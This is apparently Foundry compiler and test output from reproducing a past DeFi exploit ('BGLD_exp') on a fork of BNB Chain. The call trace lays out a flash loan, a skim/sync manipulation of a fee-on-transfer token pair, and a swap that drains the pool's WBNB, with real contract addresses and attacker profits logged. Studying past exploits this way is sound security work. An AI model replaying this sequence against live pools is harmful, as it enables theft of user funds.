Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.29s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-12/BGLD_exp.sol:17:5:
   |
17 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-12/BGLD_exp.sol:18:5:
   |
18 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:53:31:
   |
53 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:53:47:
   |
53 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:53:67:
   |
53 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:53:88:
   |
53 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:67:26:
   |
67 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:67:42:
   |
67 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:67:59:
   |
67 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                           ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/BGLD_exp.sol:67:76:
   |
67 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                            ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 571.21ms (1.77ms CPU time)

Ran 1 test for src/test/2022-12/BGLD_exp.sol:ContractTest
[PASS] testExploit() (gas: 983023)
Logs:
  [End] Attacker USDT balance after exploit: 18063.363736130073638413
  [End] Attacker WBNB balance after exploit: 8.795805412983842275

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 23844529 [2.384e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1081923] ContractTest::testExploit()
    ├─ [24665] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24665] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::approve(0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x0c5721b8db9ed51b5c9177db1d78d104e9b344d9db0765a58d46d6a160cb75a3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [25279] 0x169f715CaE1F94C203366a6890053E817C767B7C::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24665] 0xC632F90affeC7121120275610BF17Df9963F181c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [304892] 0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4::flashLoan(125000000000000000000 [1.25e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 125000000000000000000 [1.25e20])
    │   │   ├─ emit Transfer(from: 0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 125000000000000000000 [1.25e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000006c6b935b8bbd40000
    │   │   │   @ 0xfd00a7397c725890bb770b53eb3abd807f6590769de703aab8c4db97634080ec: 0x000000000000000000000000000000000000000000000067ec42f997c2da7a42 → 0x0000000000000000000000000000000000000000000000612589c3df07067a42
    │   │   └─ ← [Return] true
    │   ├─ [246004] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 125000000000000000000 [1.25e20], 0, 0x00)
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 125000000000000000000 [1.25e20]
    │   │   ├─ [8062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x7526cC9121Ba716CeC288AF155D110587e55Df8b, 125000000000000000000 [1.25e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, value: 125000000000000000000 [1.25e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcb64063ac89be2e44f3603d6505b9c3eae8da25b72acbdf56fae24d1fe763237: 0x0000000000000000000000000000000000000000000000007a11008540499804 → 0x00000000000000000000000000000000000000000000000740ca363dfc1d9804
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000006c6b935b8bbd40000 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [9611] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(125000000000000000000 [1.25e20], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3]) [staticcall]
    │   │   │   ├─ [2893] 0x7526cC9121Ba716CeC288AF155D110587e55Df8b::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 8795812119540504580 [8.795e18], 231743012965866 [2.317e14], 1670630737 [1.67e9]
    │   │   │   └─ ← [Return] [125000000000000000000 [1.25e20], 216472429926702 [2.164e14]]
    │   │   ├─ [95140] 0x7526cC9121Ba716CeC288AF155D110587e55Df8b::swap(0, 194825186934031 [1.948e14], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [60753] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 194825186934031 [1.948e14])
    │   │   │   │   ├─ emit Transfer(from: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, to: 0x0000000000000000000000000000000000000000, value: 3896503738680 [3.896e12])
    │   │   │   │   ├─ emit Transfer(from: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 194825186934031 [1.948e14])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122befadcc08dd8 → 0x0000000000000000000000000000000000000000000000000122c6115031d048
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000000b131460f7d0f
    │   │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122befadcc08dd8 → 0x0000000000000000000000000000000000000000000000000122c6115031d048
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f37381afb58b819 → 0x0000000000000000000000000000000000000000000000052f37348fc1a016e1
    │   │   │   │   │   @ 0x904856806fc6063d4e635d545610a6b52842cd906ee8998f9cf616a82c676dab: 0x0000000000000000000000000000000000000000000000000000d2c4dff78dea → 0x00000000000000000000000000000000000000000000000000000fdb794ceac3
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 133795812119540504580 [1.337e20]
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 17435307338435 [1.743e13]
    │   │   │   ├─ emit Sync(reserve0: 133795812119540504580 [1.337e20], reserve1: 17435307338435 [1.743e13])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 125000000000000000000 [1.25e20], amount1In: 0, amount0Out: 0, amount1Out: 194825186934031 [1.948e14], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x00000000000000000000000005eee3afec9d8ed90503c016e8d13ee52277d65b → 0x00000000000000000000000005f0e90a5322fb2b0e0d0010df12a251d59e10f6
    │   │   │   │   @ 8: 0x6393cd510000000000000000d2c4dff78dea0000000000007a11008540499804 → 0x63974a9e00000000000000000fdb794ceac300000000000740ca363dfc1d9804
    │   │   │   │   @ 9: 0x000000000000000000000000000000000196d9762a544c7069660a82712d4b13 → 0x00000000000000000000000000000000019cdfe6de7c56cefa9dca5be39f81c4
    │   │   │   └─ ← [Stop]
    │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   └─ ← [Return] 17435307338435 [1.743e13]
    │   │   ├─ [11653] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transfer(0x7526cC9121Ba716CeC288AF155D110587e55Df8b, 174353073384360 [1.743e14])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3487061467686 [3.487e12])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, value: 174353073384360 [1.743e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x904856806fc6063d4e635d545610a6b52842cd906ee8998f9cf616a82c676dab: 0x00000000000000000000000000000000000000000000000000000fdb794ceac3 → 0x0000000000000000000000000000000000000000000000000000ae6e364e166b
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122c6115031d048 → 0x0000000000000000000000000000000000000000000000000122cc691a509494
    │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122c6115031d048 → 0x0000000000000000000000000000000000000000000000000122cc691a509494
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000b131460f7d0f → 0x000000000000000000000000000000000000000000000000000002c30fc166a9
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f37348fc1a016e1 → 0x0000000000000000000000000000000000000000000000052f373163dc90b4bb
    │   │   │   └─ ← [Return] true
    │   │   ├─ [23457] 0x7526cC9121Ba716CeC288AF155D110587e55Df8b::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 133795812119540504580 [1.337e20]
    │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 191788380722795 [1.917e14]
    │   │   │   ├─ [11653] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 174353073384360 [1.743e14])
    │   │   │   │   ├─ emit Transfer(from: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, to: 0x0000000000000000000000000000000000000000, value: 3487061467686 [3.487e12])
    │   │   │   │   ├─ emit Transfer(from: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 174353073384360 [1.743e14])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000002c30fc166a9 → 0x0000000000000000000000000000000000000000000000000000a155ccc29251
    │   │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122cc691a509494 → 0x0000000000000000000000000000000000000000000000000122d2c0e46f58e0
    │   │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122cc691a509494 → 0x0000000000000000000000000000000000000000000000000122d2c0e46f58e0
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f373163dc90b4bb → 0x0000000000000000000000000000000000000000000000052f372e37f7815295
    │   │   │   │   │   @ 0x904856806fc6063d4e635d545610a6b52842cd906ee8998f9cf616a82c676dab: 0x0000000000000000000000000000000000000000000000000000ae6e364e166b → 5
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [8987] 0x7526cC9121Ba716CeC288AF155D110587e55Df8b::sync()
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 133795812119540504580 [1.337e20]
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 5
    │   │   │   ├─ emit Sync(reserve0: 133795812119540504580 [1.337e20], reserve1: 5)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x63974a9e00000000000000000fdb794ceac300000000000740ca363dfc1d9804 → 0x63974a9e000000000000000000000000000500000000000740ca363dfc1d9804
    │   │   │   └─ ← [Stop]
    │   │   ├─ [62433] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(100000000 [1e8], 0, [0xC2319E87280c64e2557a51Cb324713Dd8d1410a3, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1670859422 [1.67e9])
    │   │   │   ├─ [14474] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, 100000000 [1e8])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 2000000 [2e6])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, value: 100000000 [1e8])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913029639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x904856806fc6063d4e635d545610a6b52842cd906ee8998f9cf616a82c676dab: 5 → 0x0000000000000000000000000000000000000000000000000000000005f5e105
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f372e37f7815295 → 0x0000000000000000000000000000000000000000000000052f372e37f762ce15
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000a155ccc29251 → 0x0000000000000000000000000000000000000000000000000000a155c6341ad1
    │   │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122d2c0e46f58e0 → 0x0000000000000000000000000000000000000000000000000122d2c0e4ac61e0
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffa0a1eff
    │   │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122d2c0e46f58e0 → 0x0000000000000000000000000000000000000000000000000122d2c0e4ac61e0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x7526cC9121Ba716CeC288AF155D110587e55Df8b::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 133795812119540504580 [1.337e20], 5, 1670859422 [1.67e9]
    │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   └─ ← [Return] 100000005 [1e8]
    │   │   │   ├─ [38265] 0x7526cC9121Ba716CeC288AF155D110587e55Df8b::swap(133795805412983842275 [1.337e20], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 133795805412983842275 [1.337e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7526cC9121Ba716CeC288AF155D110587e55Df8b, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 133795805412983842275 [1.337e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000740ca30247e3025e3
    │   │   │   │   │   │   @ 0xcb64063ac89be2e44f3603d6505b9c3eae8da25b72acbdf56fae24d1fe763237: 0x00000000000000000000000000000000000000000000000740ca363dfc1d9804 → 0x000000000000000000000000000000000000000000000000000006197ded7221
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   │   └─ ← [Return] 6706556662305 [6.706e12]
    │   │   │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(0x7526cC9121Ba716CeC288AF155D110587e55Df8b) [staticcall]
    │   │   │   │   │   └─ ← [Return] 100000005 [1e8]
    │   │   │   │   ├─ emit Sync(reserve0: 6706556662305 [6.706e12], reserve1: 100000005 [1e8])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 100000000 [1e8], amount0Out: 133795805412983842275 [1.337e20], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x63974a9e000000000000000000000000000500000000000740ca363dfc1d9804 → 0x63974a9e0000000000000000000005f5e105000000000000000006197ded7221
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 133795805412983842275 [1.337e20]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4, 125000000000000000000 [1.25e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4, value: 125000000000000000000 [1.25e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfd00a7397c725890bb770b53eb3abd807f6590769de703aab8c4db97634080ec: 0x0000000000000000000000000000000000000000000000612589c3df07067a42 → 0x000000000000000000000000000000000000000000000067ec42f997c2da7a42
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000740ca30247e3025e3 → 0x0000000000000000000000000000000000000000000000007a10fa6bc25c25e3
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122c6115031d048 → 0x0000000000000000000000000000000000000000000000000122cc691a509494
    │   │   │   @ 0xcb64063ac89be2e44f3603d6505b9c3eae8da25b72acbdf56fae24d1fe763237: 0x0000000000000000000000000000000000000000000000007a11008540499804 → 0x00000000000000000000000000000000000000000000000740ca363dfc1d9804
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4) [staticcall]
    │   │   └─ ← [Return] 1917039083563702188610 [1.917e21]
    │   ├─ [2531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4) [staticcall]
    │   │   └─ ← [Return] 500437223009221246363553 [5.004e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4) [staticcall]
    │   │   └─ ← [Return] 1917039083563702188610 [1.917e21]
    │   ├─ [531] 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56::balanceOf(0x0fe261aeE0d1C4DFdDee4102E82Dd425999065F4) [staticcall]
    │   │   └─ ← [Return] 500437223009221246363553 [5.004e23]
